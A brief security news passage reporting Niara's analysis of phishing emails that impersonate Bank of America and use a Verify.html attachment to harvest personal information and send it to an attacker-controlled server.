Security analytics firm Niara worked with customers to analyze email traffic and found a number of malicious email campaigns that sophisticated attackers were using to circumvent traditional defenses.
Verify Campaign
In this campaign, attackers sent emails to unsuspecting employees, informing them of incorrect and missing details in their accounts with Bank of America. The emails, which appeared to have legitimately come from Bank of America, contained an attachment called Verify.html. When victims opened the attachment, they were rerouted and asked to provide additional personal information. After a victim filled out the information and submited the form, the information was then sent to an attacker-controlled IP hosted in Iran.